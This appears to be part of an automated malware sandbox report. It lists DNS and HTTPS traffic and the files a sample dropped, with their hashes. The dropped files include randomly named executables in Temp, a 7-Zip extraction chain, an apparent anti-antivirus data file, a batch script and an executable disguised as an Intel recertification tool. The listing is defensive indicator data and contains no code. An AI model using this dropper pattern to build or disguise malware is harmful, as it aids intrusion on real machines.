                      61 B
                      77 B
                      1
                      1

                      DNS Request

                      play.google.com

                      DNS Response

                      216.58.214.174

                    • 8.8.8.8:53
                      play.google.com
                      dns
                      firefox.exe
                      61 B
                      89 B
                      1
                      1

                      DNS Request

                      play.google.com

                      DNS Response

                      2a00:1450:4007:80e::200e

                    • 216.58.214.174:443
                      play.google.com
                      https
                      firefox.exe
                      3.2kB
                      9.3kB
                      7
                      10
                    • 8.8.8.8:53
                      drive.google.com
                      dns
                      df1fc80896.exe
                      62 B
                      78 B
                      1
                      1

                      DNS Request

                      drive.google.com

                      DNS Response

                      142.250.75.238

                    • 8.8.8.8:53
                      c.pki.goog
                      dns
                      df1fc80896.exe
                      56 B
                      107 B
                      1
                      1

                      DNS Request

                      c.pki.goog

                      DNS Response

                      142.250.179.67

                    • 8.8.8.8:53
                      o.pki.goog
                      dns
                      df1fc80896.exe
                      56 B
                      107 B
                      1
                      1

                      DNS Request

                      o.pki.goog

                      DNS Response

                      142.250.179.67

                    • 8.8.8.8:53
                      drive.usercontent.google.com
                      dns
                      df1fc80896.exe
                      74 B
                      90 B
                      1
                      1

                      DNS Request

                      drive.usercontent.google.com

                      DNS Response

                      142.250.74.225

                    • 8.8.8.8:53

                    MITRE ATT&CK Enterprise v15

                    Downloads

                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\activity-stream.discovery_stream.json.tmp

                      Filesize

                      28KB

                      MD5

                      b89b176bf1ddf66cc495fd1c39d125b9

                      SHA1

                      61c3e15c2c1c8e08b3e419f6c14543eab66d44fe

                      SHA256

                      aadfdf42b1315a1a58dfc0227e37083ffa945236a70a50e187629225b93bf1dd

                      SHA512

                      83a830b2134ec2911bbff1b953da575c5de5a778dd99200787d6161ce146ed2b84309c4622e6493602594bdef411fe761f1f35a8d29c4e5ac51c5edfc801c93b

                    • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl

                      Filesize

                      15KB

                      MD5

                      96c542dec016d9ec1ecc4dddfcbaac66

                      SHA1

                      6199f7648bb744efa58acf7b96fee85d938389e4

                      SHA256

                      7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798

                      SHA512

                      cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                    • C:\Users\Admin\AppData\Local\Temp\1019834001\6a0a9ad8fe.exe

                      Filesize

                      1.6MB

                      MD5

                      53ea153b46a6f91b66cf345e06043449

                      SHA1

                      cc47258ae2fd9802fe2e0abd8e60b76b4427f709

                      SHA256

                      8503ba97ce009f436b110bd820d5150bfff2a0860c9c2b7531f0fbdac15cc515

                      SHA512

                      6c2dfc4d3bf8ea3454d10c1a1df4fa542f535b67472920aa3c75f55ce9444557d4a41a0864da86667cd2457b495c02e68f7a2994385dfc776bee7dab6208e4dc

                    • C:\Users\Admin\AppData\Local\Temp\1019835001\ac7623e0c4.exe

                      Filesize

                      2.8MB

                      MD5

                      8ea0abac189af983f6146d5d449ba1b3

                      SHA1

                      f7329dbea54fa4f0827b7957e1893f6fc66fd88a

                      SHA256

                      afe849d1b68d20fd3497eb2591ef7a44f94909abd8e912d683dd618c584981ec

                      SHA512

                      34539dbf55446b1c15fbbe57e7cec1d573d955a7a95391ace83670a2886b479123a8a659a1e64779aa223d761d0a7c0ee001a01a9f27dd38a7486bb66fdb41df

                    • C:\Users\Admin\AppData\Local\Temp\1019836001\7cfad91fc9.exe

                      Filesize

                      942KB

                      MD5

                      daa8d515648afb5c90988946b5281157

                      SHA1

                      f63b38ba6869ec18dd9906967e195030e7b72b13

                      SHA256

                      79e712459f65d39971e842a08b72d56f642203930cd6d5c866e42afbe266e096

                      SHA512

                      aa9b85e5e116116a1ac1284c35a62ad4236a1eb223645d106212f1c5bc9fc779af0250b87684ba42dc70b0ec1aea3e29703eb93d63cc1bc601389459e6f642b3

                    • C:\Users\Admin\AppData\Local\Temp\1019837001\191490ec7b.exe

                      Filesize

                      2.7MB

                      MD5

                      ba91936401701b66241f22bcff1e57f8

                      SHA1

                      730b7231ab593a4fc9c8b194a04f3daff64ec85e

                      SHA256

                      94799ac4701cbf18dcf7ac3fcf7486a141015ed95f64019d7b2493c6eee12f02

                      SHA512

                      2246e9f4d51246c969ac220b85f617685b37409c28cac68e65915dca2568276bc89308be762718de52afe11ebb5b8e68f7a01924be2cf15e391f6a90858958d5

                    • C:\Users\Admin\AppData\Local\Temp\1019838001\aba28f5646.exe

                      Filesize

                      4.2MB

                      MD5

                      3a425626cbd40345f5b8dddd6b2b9efa

                      SHA1

                      7b50e108e293e54c15dce816552356f424eea97a

                      SHA256

                      ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1

                      SHA512

                      a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668

                    • C:\Users\Admin\AppData\Local\Temp\1019839001\ef0449806c.exe

                      Filesize

                      1.8MB

                      MD5

                      15709eba2afaf7cc0a86ce0abf8e53f1

                      SHA1

                      238ebf0d386ecf0e56d0ddb60faca0ea61939bb6

                      SHA256

                      10bff40a9d960d0be3cc81b074a748764d7871208f324de26d365b1f8ea3935a

                      SHA512

                      65edefa20f0bb35bee837951ccd427b94a18528c6e84de222b1aa0af380135491bb29a049009f77e66fcd2abe5376a831d98e39055e1042ccee889321b96e8e9

                    • C:\Users\Admin\AppData\Local\Temp\1019840001\97466ab734.exe

                      Filesize

                      429KB

                      MD5

                      51ff79b406cb223dd49dd4c947ec97b0

                      SHA1

                      b9b0253480a1b6cbdd673383320fecae5efb3dce

                      SHA256

                      2e3a5dfa44d59681a60d78b8b08a1af3878d8e270c02d7e31a0876a85eb42a7e

                      SHA512

                      c2b8d15b0dc1b0846f39ce007be2deb41d5b6ae76af90d618f29da8691ed987c42f3c270f0ea7f4d10cbd2d3877118f4133803c9c965b6ff236ff8cfafd9367c

                    • C:\Users\Admin\AppData\Local\Temp\1019841001\df1fc80896.exe

                      Filesize

                      591KB

                      MD5

                      3567cb15156760b2f111512ffdbc1451

                      SHA1

                      2fdb1f235fc5a9a32477dab4220ece5fda1539d4

                      SHA256

                      0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630

                      SHA512

                      e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba

                    • C:\Users\Admin\AppData\Local\Temp\1019842001\64f8e9067b.exe

                      Filesize

                      2.4MB

                      MD5

                      d885d67261c943df482d8e68105f2dd2

                      SHA1

                      d65578f07c92c0a4656d5f06a0927ce783cc5943

                      SHA256

                      4969c228d2854670fbf34fd558a7c8b675084e2afa774cc30c1a31b18a6db72d

                      SHA512

                      34cb1a5fc6819cb4808ab85ecc88f0ca1bb760d35b271bc28cbf680c0c5ff21b60d9bc708497df077a6366f7ff57fcc79c8465048c2d39e5c2225743722abc73

                    • C:\Users\Admin\AppData\Local\Temp\main\7z.dll

                      Filesize

                      1.6MB

                      MD5

                      72491c7b87a7c2dd350b727444f13bb4

                      SHA1

                      1e9338d56db7ded386878eab7bb44b8934ab1bc7

                      SHA256

                      34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891

                      SHA512

                      583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

                    • C:\Users\Admin\AppData\Local\Temp\main\7z.exe

                      Filesize

                      458KB

                      MD5

                      619f7135621b50fd1900ff24aade1524

                      SHA1

                      6c7ea8bbd435163ae3945cbef30ef6b9872a4591

                      SHA256

                      344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2

                      SHA512

                      2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

                    • C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

                      Filesize

                      2.2MB

                      MD5

                      579a63bebccbacab8f14132f9fc31b89

                      SHA1

                      fca8a51077d352741a9c1ff8a493064ef5052f27

                      SHA256

                      0ac3504d5fa0460cae3c0fd9c4b628e1a65547a60563e6d1f006d17d5a6354b0

                      SHA512

                      4a58ca0f392187a483b9ef652b6e8b2e60d01daa5d331549df9f359d2c0a181e975cf9df79552e3474b9d77f8e37a1cf23725f32d4cdbe4885e257a7625f7b1f

                    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

                      Filesize

                      1.7MB

                      MD5

                      5659eba6a774f9d5322f249ad989114a

                      SHA1

                      4bfb12aa98a1dc2206baa0ac611877b815810e4c

                      SHA256

                      e04346fee15c3f98387a3641e0bba2e555a5a9b0200e4b9256b1b77094069ae4

                      SHA512

                      f93abf2787b1e06ce999a0cbc67dc787b791a58f9ce20af5587b2060d663f26be9f648d116d9ca279af39299ea5d38e3c86271297e47c1438102ca28fce8edc4

                    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

                      Filesize

                      1.7MB

                      MD5

                      5404286ec7853897b3ba00adf824d6c1

                      SHA1

                      39e543e08b34311b82f6e909e1e67e2f4afec551

                      SHA256

                      ec94a6666a3103ba6be60b92e843075a2d7fe7d30fa41099c3f3b1e2a5eba266

                      SHA512

                      c4b78298c42148d393feea6c3941c48def7c92ef0e6baac99144b083937d0a80d3c15bd9a0bf40daa60919968b120d62999fa61af320e507f7e99fbfe9b9ef30

                    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

                      Filesize

                      1.7MB

                      MD5

                      5eb39ba3698c99891a6b6eb036cfb653

                      SHA1

                      d2f1cdd59669f006a2f1aa9214aeed48bc88c06e

                      SHA256

                      e77f5e03ae140dda27d73e1ffe43f7911e006a108cf51cbd0e05d73aa92da7c2

                      SHA512

                      6c4ca20e88d49256ed9cabec0d1f2b00dfcf3d1603b5c95d158d4438c9f1e58495f8dfa200dbe7f49b5b0dd57886517eb3b98c4190484548720dad4b3db6069e

                    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

                      Filesize

                      1.7MB

                      MD5

                      7187cc2643affab4ca29d92251c96dee

                      SHA1

                      ab0a4de90a14551834e12bb2c8c6b9ee517acaf4

                      SHA256

                      c7e92a1af295307fb92ad534e05fba879a7cf6716f93aefca0ebfcb8cee7a830

                      SHA512

                      27985d317a5c844871ffb2527d04aa50ef7442b2f00d69d5ab6bbb85cd7be1d7057ffd3151d0896f05603677c2f7361ed021eac921e012d74da049ef6949e3a3

                    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

                      Filesize

                      1.7MB

                      MD5

                      b7d1e04629bec112923446fda5391731

                      SHA1

                      814055286f963ddaa5bf3019821cb8a565b56cb8

                      SHA256

                      4da77d4ee30ad0cd56cd620f4e9dc4016244ace015c5b4b43f8f37dd8e3a8789

                      SHA512

                      79fc3606b0fe6a1e31a2ecacc96623caf236bf2be692dadab6ea8ffa4af4231d782094a63b76631068364ac9b6a872b02f1e080636eba40ed019c2949a8e28db

                    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_6.zip

                      Filesize

                      1.7MB

                      MD5

                      0dc4014facf82aa027904c1be1d403c1

                      SHA1

                      5e6d6c020bfc2e6f24f3d237946b0103fe9b1831

                      SHA256

                      a29ddd29958c64e0af1a848409e97401307277bb6f11777b1cfb0404a6226de7

                      SHA512

                      cbeead189918657cc81e844ed9673ee8f743aed29ad9948e90afdfbecacc9c764fbdbfb92e8c8ceb5ae47cee52e833e386a304db0572c7130d1a54fd9c2cc028

                    • C:\Users\Admin\AppData\Local\Temp\main\extracted\file_7.zip

                      Filesize

                      3.3MB

                      MD5

                      cea368fc334a9aec1ecff4b15612e5b0

                      SHA1

                      493d23f72731bb570d904014ffdacbba2334ce26

                      SHA256

                      07e38cad68b0cdbea62f55f9bc6ee80545c2e1a39983baa222e8af788f028541

                      SHA512

                      bed35a1cc56f32e0109ea5a02578489682a990b5cefa58d7cf778815254af9849e731031e824adba07c86c8425df58a1967ac84ce004c62e316a2e51a75c8748

                    • C:\Users\Admin\AppData\Local\Temp\main\file.bin

                      Filesize

                      3.3MB

                      MD5

                      045b0a3d5be6f10ddf19ae6d92dfdd70

                      SHA1

                      0387715b6681d7097d372cd0005b664f76c933c7

                      SHA256

                      94b392e94fa47d1b9b7ae6a29527727268cc2e3484e818c23608f8835bc1104d

                      SHA512

                      58255a755531791b888ffd9b663cc678c63d5caa932260e9546b1b10a8d54208334725c14529116b067bcf5a5e02da85e015a3bed80092b7698a43dab0168c7b

                    • C:\Users\Admin\AppData\Local\Temp\main\main.bat

                      Filesize

                      440B

                      MD5

                      3626532127e3066df98e34c3d56a1869

                      SHA1

                      5fa7102f02615afde4efd4ed091744e842c63f78

                      SHA256

                      2a0e18ef585db0802269b8c1ddccb95ce4c0bac747e207ee6131dee989788bca

                      SHA512

                      dcce66d6e24d5a4a352874144871cd73c327e04c1b50764399457d8d70a9515f5bc0a650232763bf34d4830bab70ee4539646e7625cfe5336a870e311043b2bd

                    • C:\Users\Admin\AppData\Local\Temp\tmpaddon

                      Filesize

                      442KB

                      MD5

                      85430baed3398695717b0263807cf97c

                      SHA1

                      fffbee923cea216f50fce5d54219a188a5100f41

                      SHA256

                      a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e

                      SHA512

                      06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

                    • C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

                      Filesize

                      8.0MB

                      MD5

                      a01c5ecd6108350ae23d2cddf0e77c17

                      SHA1

                      c6ac28a2cd979f1f9a75d56271821d5ff665e2b6

                      SHA256

                      345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42

                      SHA512

                      b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

                    • C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

                      Filesize

                      1.7MB

                      MD5

                      83d75087c9bf6e4f07c36e550731ccde

                      SHA1

                      d5ff596961cce5f03f842cfd8f27dde6f124e3ae

                      SHA256

                      46db3164bebffc61c201fe1e086bffe129ddfed575e6d839ddb4f9622963fb3f

                      SHA512

                      044e1f5507e92715ce9df8bb802e83157237a2f96f39bac3b6a444175f1160c4d82f41a0bcecf5feaf1c919272ed7929baef929a8c3f07deecebc44b0435164a

                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                      Filesize

                      7KB

                      MD5

                      2db32a560c1f7108c8da14a229635b03

                      SHA1

                      bbcc64fcdc627a999a70fc749286b2f2df259519

                      SHA256

                      0b79bc50bbb0895030c2f3c385164ba1953c789edb5e4ad5bc530690eb1b8864

                      SHA512

                      4a64499a0906fcacbba78024244b27f32e5acf64af37e2ae519bbd3a158d5aff6e1dea2b17c1bf1798c9051f1d462ff7da68f50784dc84e1c14bf12388b5426c

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\datareporting\glean\db\data.safe.bin

                      Filesize

                      9KB

                      MD5

                      a63512d4f6bd50aec9a11b8c01d95a89

                      SHA1

                      28c68731a6bcbafe2116590956349610637e52af

                      SHA256

                      37e9c5388611da9b96b2290f533948db4e6d9fa2eee8bb9e6ba131b4e05d9f1a

                      SHA512

                      c12f1a62377c97c98210105ff6d69c3ec4485a043858a01e3834a627d19499001fd42f1dd48cb61c4a2213decab3cfb36317053a6f6846df27ae13ea246791cc

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\datareporting\glean\pending_pings\192ec305-b8f1-4386-8e9f-c509ddc9999b

                      Filesize

                      733B

                      MD5

                      e09ce3ddc80106774b52cc9d606568e0

                      SHA1

                      64f3fe68deb4d33aab731efced476492f63a5b4e

                      SHA256

                      65956d342fe48d0d138c66a74818ce0052b4836163ad3100f2e4f482ecd32cb6

                      SHA512

                      854cfc4d82f5a1286ba59a0fc50b68719387bbd27675f6851c5b6a63293b512d3a260527e7344684141148e8bad6292082a2fa79a3a9b3b5c43d8548d746a057

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

                      Filesize

                      997KB

                      MD5

                      fe3355639648c417e8307c6d051e3e37

                      SHA1

                      f54602d4b4778da21bc97c7238fc66aa68c8ee34

                      SHA256

                      1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e

                      SHA512

                      8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

                      Filesize

                      116B

                      MD5

                      3d33cdc0b3d281e67dd52e14435dd04f

                      SHA1

                      4db88689282fd4f9e9e6ab95fcbb23df6e6485db

                      SHA256

                      f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b

                      SHA512

                      a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

                      Filesize

                      479B

                      MD5

                      49ddb419d96dceb9069018535fb2e2fc

                      SHA1

                      62aa6fea895a8b68d468a015f6e6ab400d7a7ca6

                      SHA256

                      2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539

                      SHA512

                      48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

                      Filesize

                      372B

                      MD5

                      8be33af717bb1b67fbd61c3f4b807e9e

                      SHA1

                      7cf17656d174d951957ff36810e874a134dd49e0

                      SHA256

                      e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd

                      SHA512

                      6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

                      Filesize

                      11.8MB

                      MD5

                      33bf7b0439480effb9fb212efce87b13

                      SHA1

                      cee50f2745edc6dc291887b6075ca64d716f495a

                      SHA256

                      8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e

                      SHA512

                      d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\bz1ih2a5.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

                      Filesize

                      1KB

                      MD5

                      688bed3676d2104e7f17ae1cd2c59404

                      SHA1

                      952b2cdf783ac72fcb98338723e9afd38d47ad8e

                      SHA256

                      33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237

                      SHA512

                      7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776
